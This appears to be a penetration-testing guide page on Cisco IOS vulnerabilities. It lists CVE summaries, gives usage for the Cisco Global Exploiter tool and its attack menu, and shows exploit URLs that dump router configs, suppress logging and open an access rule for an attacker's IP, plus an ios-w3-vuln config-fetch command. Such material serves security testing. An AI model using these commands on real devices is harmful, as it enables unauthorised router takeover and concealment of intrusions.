CISCO Penetration Testing - Vulnerabilities

• Common Vulnerabilities and Exploits (CVE) Information

Vulnerabilties and exploit information relating to these products can be found here:
http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=cisco+IOS

Unspecified vulnerability in Cisco IOS 12.2 allows remote attackers to cause a denial of service.
ATOMIC.TCP signature engine in the Cisco IOS 12.2 IPS feature allows remote attacks to cause a denial of service.
IPS feaure for Cisco IOS 12.3/4 allows remote attackers to bypass IPS signatures.
Cisco IOS post 12.3 with voice support and without SIP configured allows remote attackers to cause a denial of service.
Cisco IOS allows remote attackers to cause a denial of service via crafted IPv6 headers.
Cisco IOS 9-12 allows remote attackers to cause a denial of service via crafted IP option in IP header.
Memory leak in the TCP Listener in Cisco IOS 9-12 allows remote attackers to cause a denial of service.
Data-link switching in Cisco IOS 11-12.4 allows remote attacks to cause a denial of service.
• Attack Tools

Cisco Global Exploiter (CGE)
CGE is an attempt to combine all of the Cisco attacks into one tool.

perl cge.pl <target> <vulnerability number>

Vulnerabilities list :
[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability
[2] - Cisco IOS Router Denial of Service Vulnerability
[3] - Cisco IOS HTTP Auth Vulnerability
[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
[6] - Cisco 675 Web Administration Denial of Service Vulnerability
[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability
[9] - Cisco 514 UDP Flood Denial of Service Vulnerability
[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
[11] - Cisco Catalyst Memory Leak Vulnerability
[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
[13] - 0 Encoding IDS Bypass Vulnerability (UTF)
[14] - Cisco IOS HTTP Denial of Service Vulnerability

HTTP Arbitrary Access vulnerability

A common security flaw (of its time!) was/is the HTTP Arbitrary Access vulnerability. This flaw allowed an external attacker to execute router commands via the web interface. Cisco devices have a number of privilege levels, these levels start at 0 (User EXEC) and go up to 100, although mostly only the first 15 are used. Level 15 is Privileged EXEC mode, the same as enable mode.

By referring to these levels within the URL of the target device, an attacker could pass commands to the router and have them execute in Privilege EXEC mode.

• Web browse to the Cisco device: http://<IP>
• Click cancel to the logon box and enter the following address:
  http://<IP>/level/99/exec/show/config
  
  You may have to scroll through all of the levels from 16-99 for this to work.
• To raise the logging level to only log emergencies:
  
  http://<IP>/level/99/configure/logging/trap/emergencies/CR
• To add a rule to allow Telnet:
  
  http://<IP>/level/99/configure/access-list/100/permit/ip/host/<Hacker-IP>/any/CR

ios-w3-vuln

CLI tool that automatically scrolls through all available privilege levels to identify if any are vulnerable to this attack, this tool is called ios-w3-vuln (although it may have other names.) As well as identifying the vulnerable level, ios-w3-vuln will also attempt to TFTP download the running.config file to a TFTP server running locally.

./ios-w3-vul 192.168.1.1 fetch > /tmp/router.txt